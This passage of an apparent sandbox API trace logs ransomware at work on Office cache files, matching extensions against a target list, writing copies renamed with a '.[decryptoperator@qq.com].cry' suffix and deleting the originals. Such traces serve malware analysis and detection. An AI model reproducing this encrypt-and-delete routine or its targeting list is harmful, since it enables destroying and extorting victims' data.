dwFileAttributes=0x2020) returned 1 [0035.578] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.578] lstrlenW (lpString=".doc") returned 4 [0035.578] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.578] lstrlenW (lpString=".docx") returned 5 [0035.578] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.578] lstrlenW (lpString=".pdf") returned 4 [0035.578] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.578] lstrlenW (lpString=".xls") returned 4 [0035.578] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.578] lstrlenW (lpString=".xlsx") returned 5 [0035.578] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.578] lstrlenW (lpString=".ppt") returned 4 [0035.578] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.578] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.578] lstrlenW (lpString=".zip") returned 4 [0035.578] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.579] lstrlenW (lpString=".rar") returned 4 [0035.579] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString=".bz2") returned 4 [0035.579] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString=".7z") returned 3 [0035.579] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.579] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.579] lstrlenW (lpString=".dbf") returned 4 [0035.579] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.579] lstrlenW (lpString=".1cd") returned 4 [0035.579] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.579] lstrlenW (lpString=".jpg") returned 4 [0035.579] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.579] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.579] lstrlenW (lpString=".doc") returned 4 [0035.579] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString=".docx") returned 5 [0035.579] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.579] lstrlenW (lpString=".pdf") returned 4 [0035.579] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString=".xls") returned 4 [0035.579] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString=".xlsx") returned 5 [0035.579] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.579] lstrlenW (lpString=".ppt") returned 4 [0035.579] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.579] lstrlenW (lpString=".zip") returned 4 [0035.579] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.579] lstrlenW (lpString=".rar") returned 4 [0035.579] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString=".bz2") returned 4 [0035.579] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.579] lstrlenW (lpString=".7z") returned 3 [0035.579] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.580] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.580] lstrlenW (lpString=".dbf") returned 4 [0035.580] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.580] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.580] lstrlenW (lpString=".1cd") returned 4 [0035.580] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.580] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.580] lstrlenW (lpString=".jpg") returned 4 [0035.580] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.580] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.580] lstrlenW (lpString="OutlookMUI.xml") returned 14 [0035.580] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.581] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=3186) returned 1 [0035.581] CloseHandle (hObject=0x170) returned 1 [0035.581] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 0x2020 [0035.581] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.581] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.581] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.581] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.581] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.581] GetLastError () returned 0x0 [0035.581] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xc72, lpOverlapped=0x0) returned 1 [0035.613] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xc80, lpOverlapped=0x0) returned 1 [0035.614] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.614] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.614] SetEndOfFile (hFile=0x174) returned 1 [0035.614] CloseHandle (hObject=0x174) returned 1 [0035.615] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.615] SetEndOfFile (hFile=0x170) returned 1 [0035.616] CloseHandle (hObject=0x170) returned 1 [0035.616] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.616] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1 [0035.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.616] lstrlenW (lpString=".doc") returned 4 [0035.616] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.616] lstrlenW (lpString=".docx") returned 5 [0035.616] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.616] lstrlenW (lpString=".pdf") returned 4 [0035.616] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.616] lstrlenW (lpString=".xls") returned 4 [0035.616] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.616] lstrlenW (lpString=".xlsx") returned 5 [0035.616] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.616] lstrlenW (lpString=".ppt") returned 4 [0035.616] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.616] lstrlenW (lpString=".zip") returned 4 [0035.617] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.617] lstrlenW (lpString=".rar") returned 4 [0035.617] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".bz2") returned 4 [0035.617] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".7z") returned 3 [0035.617] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.617] lstrlenW (lpString=".dbf") returned 4 [0035.617] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.617] lstrlenW (lpString=".1cd") returned 4 [0035.617] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.617] lstrlenW (lpString=".jpg") returned 4 [0035.617] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.617] lstrlenW (lpString=".doc") returned 4 [0035.617] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".docx") returned 5 [0035.617] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.617] lstrlenW (lpString=".pdf") returned 4 [0035.617] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".xls") returned 4 [0035.617] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".xlsx") returned 5 [0035.617] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.617] lstrlenW (lpString=".ppt") returned 4 [0035.617] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.617] lstrlenW (lpString=".zip") returned 4 [0035.617] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.617] lstrlenW (lpString=".rar") returned 4 [0035.617] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".bz2") returned 4 [0035.617] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.617] lstrlenW (lpString=".7z") returned 3 [0035.617] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.618] lstrlenW (lpString=".dbf") returned 4 [0035.618] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.618] lstrlenW (lpString=".1cd") returned 4 [0035.618] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0035.618] lstrlenW (lpString=".jpg") returned 4 [0035.618] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.618] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.618] lstrlenW (lpString="WordMUI.xml") returned 11 [0035.618] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.618] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1800) returned 1 [0035.618] CloseHandle (hObject=0x170) returned 1 [0035.618] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 0x2020 [0035.618] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.618] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.618] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.618] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.619] GetLastError () returned 0x0 [0035.619] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x708, lpOverlapped=0x0) returned 1 [0035.626] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x710, lpOverlapped=0x0) returned 1 [0035.626] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.626] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0035.627] SetEndOfFile (hFile=0x174) returned 1 [0035.627] CloseHandle (hObject=0x174) returned 1 [0035.627] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.627] SetEndOfFile (hFile=0x170) returned 1 [0035.628] CloseHandle (hObject=0x170) returned 1 [0035.628] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.628] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1 [0035.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.629] lstrlenW (lpString=".doc") returned 4 [0035.629] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString=".docx") returned 5 [0035.629] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.629] lstrlenW (lpString=".pdf") returned 4 [0035.629] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString=".xls") returned 4 [0035.629] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString=".xlsx") returned 5 [0035.629] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.629] lstrlenW (lpString=".ppt") returned 4 [0035.629] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.629] lstrlenW (lpString=".zip") returned 4 [0035.629] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.629] lstrlenW (lpString=".rar") returned 4 [0035.629] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString=".bz2") returned 4 [0035.629] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString=".7z") returned 3 [0035.629] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.629] lstrlenW (lpString=".dbf") returned 4 [0035.629] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.629] lstrlenW (lpString=".1cd") returned 4 [0035.629] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.629] lstrlenW (lpString=".jpg") returned 4 [0035.629] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.629] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.629] lstrlenW (lpString=".doc") returned 4 [0035.629] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString=".docx") returned 5 [0035.629] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.629] lstrlenW (lpString=".pdf") returned 4 [0035.629] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.629] lstrlenW (lpString=".xls") returned 4 [0035.630] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.630] lstrlenW (lpString=".xlsx") returned 5 [0035.630] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.630] lstrlenW (lpString=".ppt") returned 4 [0035.630] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.630] lstrlenW (lpString=".zip") returned 4 [0035.630] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.630] lstrlenW (lpString=".rar") returned 4 [0035.630] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.630] lstrlenW (lpString=".bz2") returned 4 [0035.630] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.630] lstrlenW (lpString=".7z") returned 3 [0035.630] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.630] lstrlenW (lpString=".dbf") returned 4 [0035.630] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.630] lstrlenW (lpString=".1cd") returned 4 [0035.630] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.630] lstrlenW (lpString=".jpg") returned 4 [0035.630] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.630] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.630] lstrlenW (lpString="Proof.xml") returned 9 [0035.630] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.639] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1457) returned 1 [0035.640] CloseHandle (hObject=0x188) returned 1 [0035.640] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 0x2020 [0035.640] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.640] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.640] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.640] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.640] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.640] GetLastError () returned 0x0 [0035.640] ReadFile (in: hFile=0x188, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x5b1, lpOverlapped=0x0) returned 1 [0035.671] WriteFile (in: hFile=0x19c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0035.672] ReadFile (in: hFile=0x188, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.672] WriteFile (in: hFile=0x19c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.672] SetEndOfFile (hFile=0x19c) returned 1 [0035.672] CloseHandle (hObject=0x19c) returned 1 [0035.672] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: 